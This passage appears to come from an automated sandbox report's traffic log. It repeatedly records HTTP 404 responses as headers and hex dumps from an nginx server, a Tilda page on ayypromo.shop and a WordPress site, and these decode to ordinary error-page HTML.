20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 23 Aug 2024 06:27:37 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 23 Aug 2024 06:27:40 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=saVwnY22lPcVFRRj7DXt; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Sat, 23-Aug-2025 06:27:53 GMTDate: Fri, 23 Aug 2024 06:27:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=xrV3g1EcKglXvx5gTa3Y; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Sat, 23-Aug-2025 06:27:56 GMTDate: Fri, 23 Aug 2024 06:27:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=zktx3D3fuI3Ukxob0eWk; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Sat, 23-Aug-2025 06:27:58 GMTDate: Fri, 23 Aug 2024 06:27:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=VZpP6SRdlqwV0ic1DCHJ; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Sat, 23-Aug-2025 06:28:01 GMTDate: Fri, 23 Aug 2024 06:28:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"X-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 06:28:07 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 5f 44 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 6e 64 66 75 6c 20 64 65 73 69 67 6e 20 61 6e 64 20 61 72 74 20 70 72 6f 6a 65 63 74 73 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 06:28:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 5f 44 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 6e 64 66 75 6c 20 64 65 73 69 67 6e 20 61 6e 64 20 61 72 74 20 70 72 6f 6a 65 63 74 73 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 06:28:12 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 